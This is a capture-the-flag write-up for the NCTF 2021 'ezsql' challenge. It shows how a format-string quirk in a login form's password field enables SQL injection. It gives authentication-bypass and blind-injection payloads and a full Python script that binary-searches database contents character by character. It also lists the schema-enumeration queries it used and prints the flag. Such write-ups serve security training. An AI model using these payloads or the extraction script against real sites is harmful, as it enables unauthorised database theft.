2021NCTF

ezsql

格式化字符串漏洞，之前 hack.lu 做过，payload 是

password=1%1$') or 1=1#&name=a
NCTF{3v3ryth1ng_not_fantast1c_:)}

接下来就是常规的盲注了

password=1%1$') or substr(database(),1,1)>0#&name=a
payload=f"1%1$') or substr(({change_pa}),{i},1)>{mid}#"
表名:
NcTF,users
import requests
# Target from the writeup; one Session is reused so cookies set by login.php
# persist across the many near-identical POSTs the extraction loop sends.
s = requests.Session()
url = "http://129.211.173.64:3080/login.php"

def sql_in(change_pa: str) -> None:
    """Recover the result of ``change_pa`` one character at a time.

    Boolean-based blind extraction: for every position the character's
    ASCII code is binary-searched between 0 and 264, each probe costing one
    login request. The oracle is purely the response body — the login page
    echoes the known flag prefix when the injected condition is true and
    does not otherwise, so the format-string sink in the password field
    turns every request into one bit of information.

    Stops at the first position whose search ends in 0 (``ascii('')`` past
    the end of the string) or 264 (no code fits), printing the running
    result after each recovered character. Reads the module-level ``s``
    (session) and ``url``.

    Note for the defending side: a successful run is a burst of ~8-9
    POSTs per character to the same endpoint, identical except for one
    comparison number inside the password value — exactly the shape that
    per-endpoint rate limiting or request-body logging would surface.
    """

    def is_greater(pos: int, threshold: int) -> bool:
        # One probe: true iff ascii(char at pos) > threshold, judged by the
        # flag prefix appearing in the page.
        payload = f"1%1$') or ascii(substr(({change_pa}),{pos},1))>{threshold}#"
        form = {"password": payload, "name": "a"}
        body = s.post(url=url, data=form).text
        return "NCTF{3v3ryth1" in body

    recovered = ""
    for pos in range(1, 10000):
        lo, hi = 0, 264
        while lo < hi:
            guess = (lo + hi) // 2
            if is_greater(pos, guess):
                lo = guess + 1
            else:
                hi = guess
        # Loop exit leaves lo == hi, which is the code the search settled on.
        code = lo
        if code in (0, 264):
            break
        recovered += chr(code)
        print(recovered)

if __name__ == "__main__":
    # Queries used during the writeup, in enumeration order (earlier stages
    # kept for reference; only the last one is run):
    #   database()
    #   select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()
    #   select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x4e635446
    #   version()
    # Final stage: read the second row of the flag column of table NcTF.
    query = 'select/**/`fl@g`/**/from/**/NcTF limit 1,1'
    sql_in(query)
Author

vague huang

Posted on

2021-11-29

Updated on

2021-11-29
